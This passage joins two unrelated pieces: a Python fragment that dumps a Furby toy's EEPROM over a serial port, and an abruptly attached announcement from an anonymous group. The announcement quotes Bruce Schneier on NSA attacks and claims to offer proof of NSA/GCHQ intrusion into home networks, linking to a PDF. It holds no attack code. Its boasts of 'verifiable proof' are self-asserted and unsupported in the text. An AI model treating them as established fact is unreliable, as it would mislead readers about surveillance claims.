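with serial.Serial("/dev/ttyUSB0", 9600, timeout=10) as port:
    while len(rows) < 16:
        fields = port.readline().decode("ascii", "replace").split()
        if fields:
            rows.append(bytes(int(b, 16) for b in fields))

with open("furby_eeprom.bin", "wb") as out:
    out.write(b"".join(rows))
print("wrote", sum(len(r) for r in rows), "bytes")

Having the dump as a flat binary file makes it easy to diff successive reads, which is exactly the "watch the contents change over time" approach suggested above.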
  24. Full Disclosure

The Internet Dark Age

• Removing Governments on-line stranglehold
• Disabling NSA/GCHQ major capabilities (BULLRUN / EDGEHILL)
• Restoring on-line privacy - immediately

by The Adversaries

Update 1 - Spread the Word

Uncovered – //NONSA//NOGCHQ//NOGOV - CC BY-ND

On September 5th 2013, Bruce Schneier wrote in The Guardian:

“The NSA also attacks network devices directly: routers, switches, firewalls, etc. Most of these devices have surveillance capabilities already built in; the trick is to surreptitiously turn them on. This is an especially fruitful avenue of attack; routers are updated less frequently, tend not to have security software installed on them, and are generally ignored as a vulnerability”.

“The NSA also devotes considerable resources to attacking endpoint computers. This kind of thing is done by its TAO – Tailored Access Operations – group. TAO has a menu of exploits it can serve up against your computer – whether you're running Windows, Mac OS, Linux, iOS, or something else – and a variety of tricks to get them on to your computer. Your anti-virus software won't detect them, and you'd have trouble finding them even if you knew where to look. These are hacker tools designed by hackers with an essentially unlimited budget. What I took away from reading the Snowden documents was that if the NSA wants in to your computer, it's in. Period”.

http://www.theguardian.com/world/2013/sep/05/nsa-how-to-remain-securesurveillance

The evidence provided by this Full-Disclosure is the first independent technical verifiable proof that Bruce Schneier's statements are indeed correct. We explain how NSA/GCHQ:

• Are Internet wiretapping you
• Break into your home network
• Perform 'Tailored Access Operations' (TAO) in your home
• Steal your encryption keys
• Can secretly plant anything they like on your computer
• Can secretly steal anything they like from your computer
• How to STOP this Computer Network Exploitation

Download: http://cryptome.org/2013/12/Full-Disclosure.pdf